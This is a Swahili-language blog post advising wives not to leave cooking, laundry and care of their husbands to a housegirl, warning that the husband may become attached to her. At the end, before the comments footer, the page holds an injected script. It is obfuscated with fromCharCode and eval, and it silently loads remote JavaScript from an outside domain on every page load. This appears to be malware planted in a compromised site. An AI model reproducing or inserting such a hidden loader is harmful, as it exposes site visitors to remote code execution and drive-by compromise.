Kama kuna watu wanaitafuta ndoa kwa tabu basi huwa ni wanawake kwakua mamuzi makubwa hubaki kwa mwanaume ndie huamua ndoa iwe au isiwe kwa kua yeye ndio muoaji.
Ila wanawake wakishaingia kwenye ndoa tu huanza kuzitumikia kwa bidii mwanzoani badae kidogo wanaishi kwa mazoea mwanamke alieplewa baada ya kuitumikia ndoa yake mwanzo akishaizoea huhitaji dada wa kazi (housegirl) kwakua kazi zinambana.
Siyo mbaya ni sawa utakuta mwanamke kweli kajiajiri au kajiriwa ila kwenye kazi ya kuajiriwa hutambua mtu alieolewa anatakiwa kutumikia kazi mda gani na hapa nazungumzia kazi rasmi basi.
Kutafuta dada wa kazi ni jambo jema ila zipo kazi za kufanywa na dada wakazi unakuta mwanamke dada wakazi akishafika kwakua mgeni atakua nae karibu akimuelekeza namna ya kupika akishajua tu anamuachia dada wa kazi kupika chakula japo ni cha familia.
Wanawake wanasahau ndicho hicho chakula anakula mmeo kinapikwa na dada wakazi kutenga mezani ni dada wakazi ye akijiskia kutenga ataleta maji ya kunywa tu, nguo zitafuliwa na dada wa kazi za mmeo atamkunjia nasiku moja moja baba akiwahi kutoka we unamuambia dada wakazi akatandike kitanda ulicholala na mmeo
Kikawaida mazoea hujenga tabia pesa za matumizi anachiwa dada wakazi we unakua tu kazi yako ni kuagiza leo pika ndizi kama uko hotelini dada wakazi anaenda kununua anapika wakati mwingine ukiona unachagua vyakula vyote unamuliza mmeo eti leo tupike nini unataka ule nini mwanaume anakujibu mulize dada au ntakula chochote ujue tu hii sio dalili nzuri maana ashaona majukumu mengi dada ndio hufanya.
Sasa huenda ye akawa anajua kila kitu kwako utaona nisawa basi dada atapika ajuacho atawatengea mtakula mtaenda kulala huku ukijisingizia uchovu ambapo utamtamkia mmeo bali bos wako huko kazini yani leo nimefanya kazi nimechoka kweli.
Mara nyingi mme atakupa pole mazoea yako yataota mizizi dada wa kazi atafanya majukumu yote uliotakiwa mfanyia mmeo wakati mwingine mwanaume atawahi kurudi we bado uko kazini ataempokea ni dada wakazi kesho mwanaume ataona dada wakazi mbona anafanya yale majukumu ambayo alikua akisema nikioa sitafua tena sitapika tena sitapiga pasi.
Hapa ataona huyu ndio hutekeleza yale ambayo yalikua kiau yake yakuoa hapo ataanza kumshawishi kumuongezea mshahara huku akimtamani kimahaba na mtoto wa watu nae ni mwanadamu anahisia kwanza mmemfungia ndani mda wote hapati nafasi ya kuchangamana na watu
Labda atapata shida mwanzo kumzoe baba lakini siku akijaribu mara moja ujue kesho hana uoga tena pole pole anamzoea baba tena huwa kimbelembele kuzifanya kazi zote baba anazoagiza kwa ufasaha hapo unakuja kushtuka unakua ushachelewa nyumba imetekwa ukiwepo.
Dada wakazi sio mbaya kuwa nae elewa kazi za dada wa kazi ni hizi apige deki aipange nyumba awafulie watoto na kuwatunza vyema muwapo kazini lakni sio kumfulia mmeo au kumpikia au kunyosha nguo zake kazi zake ziwe nmza nje watoto na usafi wa mazingira lakni mambo yakumuhudumia mmeo hilo ni jukumu lako.
Mke Ukifanya Hivi Utaumia Sanaa
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments